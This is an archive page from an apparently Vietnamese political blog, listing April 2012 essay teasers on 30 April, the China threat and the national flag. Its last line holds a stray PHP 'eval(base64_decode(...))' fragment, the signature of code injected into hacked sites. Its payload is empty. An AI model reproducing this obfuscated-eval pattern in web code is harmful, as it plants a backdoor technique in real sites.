Archive for April, 2012

Câu hỏi tháng Tư

Câu hỏi tháng Tư

Ngày 30 tháng 4, ngoài tất cả ý nghĩa mà chúng ta đã biết, còn là ngày để mỗi người nhìn lại chính mình, ngày để mỗi chúng ta tự hỏi mình đã làm gì cho đất nước, và đang đứng đâu trong cuộc vận hành của lịch sử hôm nay. Mỗi ng

04.29.2012 | Tiểu Luận- Chính Luận |

4 Comments

Hiểm họa Trung Quốc và bài học Thổ Nhĩ Kỳ

Hiểm họa Trung Quốc và bài học Thổ Nhĩ Kỳ

Chiến tranh sẽ đến. Không cần phải là nhà tiên tri hay nhà khoa học xã hội cũng có thể đoán được. Lịch sử loài người đã chứng minh chiến tranh và hòa bình là hai mặt biện chứng trong tiến trình phát triển của xã hội loài người. Ve

04.20.2012 | Tiểu Luận- Chính Luận |

No Comments

Cờ đỏ sao vàng là cờ tổ quốc?

Cờ đỏ sao vàng là cờ tổ quốc?

Macy’s là một trong 20 công ty buôn bán sản phẩm tiêu dùng lớn nhất nước Mỹ. Đứng đầu danh sách là Walmart. Cách đây vài năm, trên diễn đàn Internet, một người hay một nhóm người Việt nào đó tố cáo công ty Macy’s “treo cờ Cộng Sả

04.7.2012 | Tiểu Luận- Chính Luận |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>